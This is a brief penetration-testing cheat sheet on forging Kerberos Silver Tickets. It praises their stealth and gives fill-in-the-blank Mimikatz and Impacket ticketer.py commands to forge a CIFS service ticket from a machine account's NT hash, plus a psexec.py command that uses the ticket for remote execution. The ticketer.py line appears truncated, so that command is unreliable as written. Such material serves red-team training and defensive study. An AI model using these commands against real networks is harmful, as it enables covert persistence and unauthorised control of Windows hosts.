Forge Silver Ticket

A Silver Ticket is a forged TGS, signed using the secret keys of a machine account. This can be useful for short-term persistence and is considered stealthy. The large benefit of creating a silver ticket is that we can create it offline, meaning that it can be very hard for an organization to track when one is created.

Mimikatz

Creation of a silver ticket utilizing Mimikatz:

kerberos::golden /user:Administrator /domain:$domain /sid:$domain_sid /target:$target_machine /service:cifs /rc4:$nthash /ticket:$output

Ticketer.py

Creation of a silver ticket using Impacket:

ticketer.py -nthash $nthash -domain-sid $domain_sid -domain $domain -spn cifs/$target_machine $u
export KRB5CCNAME=$user.ccache

Utilizing the Silver Ticket

Utilizing a silver ticket using Impacket:

psexec.py $domain/$user@$target_machine -k -no-pass

References